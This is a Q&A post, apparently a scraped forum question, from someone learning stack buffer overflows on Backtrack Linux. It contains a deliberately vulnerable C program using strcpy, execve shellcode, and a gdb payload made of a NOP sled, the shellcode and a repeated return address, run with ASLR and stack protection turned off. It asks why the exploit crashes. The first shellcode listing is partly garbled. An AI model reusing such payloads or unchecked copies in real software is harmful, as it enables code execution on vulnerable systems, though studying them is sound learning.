I am trying to learn how to use a simple streaming method in Backtrack Linux.
Here is my C program
#include <stdio.h> #include <string.h> int main(int argc, char **argv) { char buffer[500]; if(argc==2) { strcpy(buffer, argv[1]); //vulnerable function } return 0; }
This is the shellcode I am using, which corresponds to the simple /bin/ls \ X31 \ xc0 \ x83 \ XEC \ x01 \ x88 \ x04 \ x24 \ x68 \ x6e \ x2f \ x6c \ x73 \ x66 \ x68 \ x62 \ x69 \ x83 \ XEC \ x01 \ xc6 \ x04 \ x24 \ x2f \ x89 \ XE6 \ x50 \ x56 \ XB0 \ x0b \ x89 \ xf3 \ x89 \ xe1 \ x31 \ XD2 \ XCD \ x80 \ XB0 \ x01 \ x31 \ XDB \ XCD \ x80
I embed this shellcode in gdb using the following command
run $(python -c 'print "\x90" * 331 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x6e\x2f\x6c\x73\x66\x68\x62\x69\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x0c\xd3\xff\xff"*35')
When I exit through the application, it generates SIG FAULT in the final ret command. At this point, EIP correctly set to 0xffffd30c . This address is addressed and contains a series of NOP , followed by my shell code, as shown in the payload.
I disabled ASLR sudo echo 0 > /proc/sys/kernel/randomize_va_space
and also compiled my binary using the fno-stack-protector option.
Any idea what is the reason for SIGSEGV?
source share